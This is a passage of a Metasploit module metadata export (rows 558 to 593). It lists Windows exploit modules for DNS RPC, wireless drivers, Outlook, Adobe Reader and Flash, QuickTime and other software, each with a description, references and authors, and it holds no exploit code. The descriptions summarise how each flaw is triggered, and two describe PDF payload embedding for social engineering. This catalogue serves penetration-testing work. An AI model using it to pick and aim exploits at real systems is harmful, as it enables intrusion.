Much thanks to snort.org and Jean-Baptiste Marchand's excellent MSRPC website.","Metasploit Framework License (BSD)","t","2005-04-12 00:00:00",0,,"aggressive","t","BID-13112, CVE-2005-0059, MSB-MS05-017, OSVDB-15458","hdm " 558,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb","exploit","windows/dcerpc/ms07_029_msdns_zonename","exploit/windows/dcerpc/ms07_029_msdns_zonename","Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",500,"This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2.","Metasploit Framework License (BSD)","t","2007-04-12 00:00:00",0,,"aggressive","t","CVE-2007-1748, MSB-MS07-029, OSVDB-34100, URL-http://www.microsoft.com/technet/security/advisory/935964.mspx","Unknown, hdm " 559,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms07_065_msmq.rb","exploit","windows/dcerpc/ms07_065_msmq","exploit/windows/dcerpc/ms07_065_msmq","Microsoft Message Queueing Service DNS Name Path Overflow",400,"This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. 
This name does not need to be served by a valid DNS server, only configured on the target machine.","Metasploit Framework License (BSD)","t","2007-12-11 00:00:00",0,,"aggressive","t","CVE-2007-3039, MSB-MS07-065, OSVDB-39123","hdm " 560,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/broadcom_wifi_ssid.rb","exploit","windows/driver/broadcom_wifi_ssid","exploit/windows/driver/broadcom_wifi_ssid","Broadcom Wireless Driver Probe Response SSID Overflow",100,"This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending a 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-11 00:00:00",0,,"aggressive","t","CVE-2006-5882, OSVDB-30294, URL-http://projects.info-pull.com/mokb/MOKB-11-11-2006.html","Chris Eagle, Johnny Cache , hdm , skape " 561,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/dlink_wifi_rates.rb","exploit","windows/driver/dlink_wifi_rates","exploit/windows/driver/dlink_wifi_rates","D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",100,"This module exploits a stack buffer overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). 
Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then accessing the Windows wireless network browser and forcing it to refresh. D-Link was NOT contacted about this flaw. A search of the SecurityFocus database indicates that D-Link has not provided an official patch or solution for any of the seven flaws listed at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). As of November 17th, 2006, D-Link has fixed the flaw in the latest version of the DWL-G132 driver (v1.21). This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-13 00:00:00",0,,"aggressive","t","CVE-2006-6055, OSVDB-30296, URL-ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip, URL-http://projects.info-pull.com/mokb/MOKB-13-11-2006.html","Johnny Cache , hdm , skape " 562,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/driver/netgear_wg111_beacon.rb","exploit","windows/driver/netgear_wg111_beacon","exploit/windows/driver/netgear_wg111_beacon","NetGear WG111v2 Wireless Driver Long Beacon Overflow",100,"This module exploits a stack buffer overflow in the NetGear WG111v2 wireless device driver. This stack buffer overflow allows remote code execution in kernel mode. 
The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains more than 1100 bytes worth of information elements. This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:18:4d:02:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then unplugging and reinserting the USB card. The exploit can take up to a minute to execute the payload, depending on system activity. NetGear was NOT contacted about this flaw. A search of the SecurityFocus database indicates that NetGear has not provided an official patch or solution for any of the thirty flaws listed at the time of writing. This list includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, 16835, 19468, and 19973. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-16 00:00:00",0,,"aggressive","t","CVE-2006-5972, OSVDB-30473, URL-http://projects.info-pull.com/mokb/MOKB-16-11-2006.html","hdm " 563,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb","exploit","windows/email/ms07_017_ani_loadimage_chunksize","exploit/windows/email/ms07_017_ani_loadimage_chunksize","Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",500,"This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. 
The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.","Metasploit Framework License (BSD)","f","2007-03-28 00:00:00",0,,"passive","t","BID-23194, CVE-2007-0038, CVE-2007-1765, MSB-MS07-017, OSVDB-33629, URL-http://www.determina.com/security.research/vulnerabilities/ani-header.html, URL-http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp, URL-http://www.microsoft.com/technet/security/advisory/935423.mspx","hdm , skape " 564,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb","exploit","windows/email/ms10_045_outlook_ref_only","exploit/windows/email/ms10_045_outlook_ref_only","Outlook ATTACH_BY_REF_ONLY File Execution",600,"It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely, for example on a file share. 
Exploitation is limited by the fact that it is not possible for attackers to supply command line options.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",0,,"passive","t","BID-41446, CVE-2010-0266, MSB-MS10-045, OSVDB-66296, URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001","Yorick Koster " 565,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb","exploit","windows/email/ms10_045_outlook_ref_resolve","exploit/windows/email/ms10_045_outlook_ref_resolve","Outlook ATTACH_BY_REF_RESOLVE File Execution",600,"It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely, for example on a file share. Exploitation is limited by the fact that it is not possible for attackers to supply command line options.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",0,,"passive","t","BID-41446, CVE-2010-0266, MSB-MS10-045, OSVDB-66296, URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001","Yorick Koster " 566,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/emc/alphastor_agent.rb","exploit","windows/emc/alphastor_agent","exploit/windows/emc/alphastor_agent","EMC AlphaStor Agent Buffer Overflow",500,"This module exploits a stack buffer overflow in EMC AlphaStor 3.1. 
By sending a specially crafted message, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-05-27 00:00:00",0,,"aggressive","t","CVE-2008-2158, OSVDB-45714, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702","MC " 567,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/emc/networker_format_string.rb","exploit","windows/emc/networker_format_string","exploit/windows/emc/networker_format_string","EMC Networker Format String",300,"This module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55330, CVE-2012-2288, OSVDB-85116, URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt, URL-http://blog.exodusintel.com/2012/08/29/when-wrapping-it-up-goes-wrong/","Aaron Portnoy, Luigi Auriemma , juan vazquez " 568,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb","exploit","windows/fileformat/a-pdf_wav_to_mp3","exploit/windows/fileformat/a-pdf_wav_to_mp3","A-PDF WAV to MP3 v1.0.0 Buffer Overflow",300,"This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. 
When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-08-17 00:00:00",0,,"aggressive","t","EDB-14676, EDB-14681, OSVDB-67241","Dr_IDE, d4rk-h4ck3r, dookie" 569,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb","exploit","windows/fileformat/acdsee_fotoslate_string","exploit/windows/fileformat/acdsee_fotoslate_string","ACDSee FotoSlate PLP File id Parameter Overflow",400,"This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","BID-49558, CVE-2011-2595, OSVDB-75425","Parvez Anwar, juan vazquez " 570,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/acdsee_xpm.rb","exploit","windows/fileformat/acdsee_xpm","exploit/windows/fileformat/acdsee_xpm","ACDSee XPM File Section Buffer Overflow",400,"This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",0,,"aggressive","t","BID-23620, CVE-2007-2193, OSVDB-35236","MC " 571,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/actfax_import_users_bof.rb","exploit","windows/fileformat/actfax_import_users_bof","exploit/windows/fileformat/actfax_import_users_bof","ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",300,"This module exploits a vulnerability in ActiveFax Server. 
The vulnerability is a stack based buffer overflow in the ""Import Users from File"" function, due to the insecure usage of strcpy while parsing the csv formatted file. The module creates a .exp file that must be imported with ActiveFax Server. It must be imported with the default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.","Metasploit Framework License (BSD)","t","2012-08-28 00:00:00",0,,"aggressive","t","EDB-20915, OSVDB-85175, URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html","Brandon Perry, Craig Freyman, juan vazquez " 572,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/activepdf_webgrabber.rb","exploit","windows/fileformat/activepdf_webgrabber","exploit/windows/fileformat/activepdf_webgrabber","activePDF WebGrabber ActiveX Control Buffer Overflow",100,"This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-08-26 00:00:00",0,,"aggressive","t","OSVDB-64579, URL-http://www.activepdf.com/products/serverproducts/webgrabber/","MC " 573,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb","exploit","windows/fileformat/adobe_collectemailinfo","exploit/windows/fileformat/adobe_collectemailinfo","Adobe Collab.collectEmailInfo() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. 
By creating a specially crafted pdf that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"aggressive","t","CVE-2007-5659, OSVDB-41495","Didier Stevens , MC " 574,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb","exploit","windows/fileformat/adobe_cooltype_sing","exploit/windows/fileformat/adobe_cooltype_sing","Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",500,"This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"aggressive","t","CVE-2010-2883, OSVDB-67849, URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html, URL-http://www.adobe.com/support/security/advisories/apsa10-02.html","Unknown, jduck , sn0wfl0w" 575,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb","exploit","windows/fileformat/adobe_flashplayer_button","exploit/windows/fileformat/adobe_flashplayer_button","Adobe Flash Player ""Button"" Remote Code Execution",300,"This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. 
This method is unlikely to work across various Windows versions due to the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-10-28 00:00:00",0,,"aggressive","t","BID-44504, CVE-2010-3654, OSVDB-68932, URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-05.html","Haifei Li, Unknown, jduck " 576,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb","exploit","windows/fileformat/adobe_flashplayer_newfunction","exploit/windows/fileformat/adobe_flashplayer_newfunction","Adobe Flash Player ""newfunction"" Invalid Pointer Use",300,"This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. 
This method is unlikely to work across various Windows versions due to the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-06-04 00:00:00",0,,"aggressive","t","BID-40586, CVE-2010-1297, OSVDB-65141, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-01.html","Unknown, jduck " 577,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb","exploit","windows/fileformat/adobe_flatedecode_predictor02","exploit/windows/fileformat/adobe_flatedecode_predictor02","Adobe FlateDecode Stream Predictor 02 Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.","Metasploit Framework License (BSD)","f","2009-10-08 00:00:00",0,,"aggressive","t","BID-36600, CVE-2009-3459, OSVDB-58729, URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html, URL-http://www.fortiguard.com/analysis/pdfanalysis.html","jduck , unknown" 578,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_geticon.rb","exploit","windows/fileformat/adobe_geticon","exploit/windows/fileformat/adobe_geticon","Adobe Collab.getIcon() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. 
By creating a specially crafted pdf that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"aggressive","t","CVE-2009-0927, OSVDB-53647, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-014/","Didier Stevens , MC , jduck " 579,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb","exploit","windows/fileformat/adobe_illustrator_v14_eps","exploit/windows/fileformat/adobe_illustrator_v14_eps","Adobe Illustrator CS4 v14.0.0",500,"Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit","Metasploit Framework License (BSD)","f","2009-12-03 00:00:00",0,,"aggressive","t","BID-37192, CVE-2009-4195, EDB-10281, OSVDB-60632, URL-http://retrogod.altervista.org/9sg_adobe_illuso.html","Nine:Situations:Group::pyrokinesis, dookie" 580,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_jbig2decode.rb","exploit","windows/fileformat/adobe_jbig2decode","exploit/windows/fileformat/adobe_jbig2decode","Adobe JBIG2Decode Memory Corruption",400,"This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. 
This module relies upon javascript for the heap spray.","Metasploit Framework License (BSD)","f","2009-02-19 00:00:00",0,,"aggressive","t","CVE-2009-0658, OSVDB-52073, URL-http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html","Didier Stevens , MC , natron , redsand, xort" 581,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_libtiff.rb","exploit","windows/fileformat/adobe_libtiff","exploit/windows/fileformat/adobe_libtiff","Adobe Acrobat Bundled LibTIFF Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.","Metasploit Framework License (BSD)","f","2010-02-16 00:00:00",0,,"aggressive","t","BID-38195, CVE-2010-0188, OSVDB-62526, URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html, URL-http://secunia.com/blog/76/, URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html","Microsoft, jduck , villy " 582,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_media_newplayer.rb","exploit","windows/fileformat/adobe_media_newplayer","exploit/windows/fileformat/adobe_media_newplayer","Adobe Doc.media.newPlayer Use After Free Vulnerability",400,"This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.","Metasploit Framework License (BSD)","f","2009-12-14 00:00:00",0,,"aggressive","t","BID-37331, CVE-2009-4324, OSVDB-60980","hdm , jduck , pusscat , unknown" 583,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb","exploit","windows/fileformat/adobe_pdf_embedded_exe","exploit/windows/fileformat/adobe_pdf_embedded_exe","Adobe PDF Embedded EXE Social Engineering",600,"This module embeds a Metasploit payload into an existing PDF file. 
The resulting PDF can be sent to a target as part of a social engineering attack.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","CVE-2010-1240, OSVDB-63667, URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/, URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/, URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/, URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html","Colin Ames , jduck " 584,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb","exploit","windows/fileformat/adobe_pdf_embedded_exe_nojs","exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs","Adobe PDF Escape EXE Social Engineering (No JavaScript)",600,"This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","CVE-2010-1240, OSVDB-63667, URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/, URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/, URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/, URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html","Jeremy Conway " 585,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_reader_u3d.rb","exploit","windows/fileformat/adobe_reader_u3d","exploit/windows/fileformat/adobe_reader_u3d","Adobe Reader U3D Memory Corruption Vulnerability",200,"This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. 
A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"aggressive","t","BID-50922, CVE-2011-2462, OSVDB-77529, URL-http://blog.9bplus.com/analyzing-cve-2011-2462, URL-http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/, URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html, URL-http://www.adobe.com/support/security/advisories/apsa11-04.html, URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0","Felipe Andres Manzano, jduck , juan vazquez , sinn3r " 586,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb","exploit","windows/fileformat/adobe_u3d_meshdecl","exploit/windows/fileformat/adobe_u3d_meshdecl","Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",400,"This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that contains malformed U3D data, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-13 00:00:00",0,,"aggressive","t","CVE-2009-3953, OSVDB-61690, URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html","Felipe Andres Manzano , jduck " 587,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_utilprintf.rb","exploit","windows/fileformat/adobe_utilprintf","exploit/windows/fileformat/adobe_utilprintf","Adobe util.printf() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. 
By creating a specially crafted pdf that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"aggressive","t","CVE-2008-2992, OSVDB-49520","Didier Stevens , MC " 588,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/altap_salamander_pdb.rb","exploit","windows/fileformat/altap_salamander_pdb","exploit/windows/fileformat/altap_salamander_pdb","Altap Salamander 2.5 PE Viewer Buffer Overflow",400,"This module exploits a buffer overflow in Altap Salamander <= v2.5. By creating a malicious file and convincing a user to view the file with the Portable Executable Viewer plugin within a vulnerable version of Salamander, the PDB file string is copied onto the stack and the SEH can be overwritten.","Metasploit Framework License (BSD)","f","2007-06-19 00:00:00",0,,"aggressive","t","BID-24557, CVE-2007-3314, OSVDB-37579, URL-http://vuln.sg/salamander25-en.html","patrick " 589,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aol_desktop_linktag.rb","exploit","windows/fileformat/aol_desktop_linktag","exploit/windows/fileformat/aol_desktop_linktag","AOL Desktop 9.6 RTX Buffer Overflow",300,"This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct component. 
By supplying a long string of data in the hyperlink tag, rich.rct copies this data into a buffer using a strcpy function, which causes an overflow and results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-01-31 00:00:00",0,,"aggressive","t","EDB-16085, OSVDB-70741","mr_me , sickn3ss, silent_dream, sinn3r , sup3r" 590,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aol_phobos_bof.rb","exploit","windows/fileformat/aol_phobos_bof","exploit/windows/fileformat/aol_phobos_bof","AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",200,"This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to 'Import()', an attacker can overrun a buffer and execute arbitrary code. NOTE: This ActiveX control is NOT marked safe for scripting or initialization.","Metasploit Framework License (BSD)","f","2010-01-20 00:00:00",0,,"aggressive","t","EDB-11204, OSVDB-61964, URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/","Trancer " 591,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb","exploit","windows/fileformat/apple_quicktime_pnsize","exploit/windows/fileformat/apple_quicktime_pnsize","Apple QuickTime PICT PnSize Buffer Overflow",400,"This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. 
When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-08-08 00:00:00",0,,"aggressive","t","BID-49144, CVE-2011-0257","MC , corelanc0d3r " 592,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/apple_quicktime_texml.rb","exploit","windows/fileformat/apple_quicktime_texml","exploit/windows/fileformat/apple_quicktime_texml","Apple QuickTime TeXML Style Element Stack Buffer Overflow",300,"This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results in the overflow.","Metasploit Framework License (BSD)","f","2012-05-15 00:00:00",,,"aggressive","t","BID-53571, CVE-2012-0663, OSVDB-81934, URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html, URL-http://support.apple.com/kb/HT1222, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-107/","Alexander Gavrun, juan vazquez , sinn3r " 593,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audio_coder_m3u.rb","exploit","windows/fileformat/audio_coder_m3u","exploit/windows/fileformat/audio_coder_m3u","AudioCoder .M3U Buffer Overflow",300,"This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. 
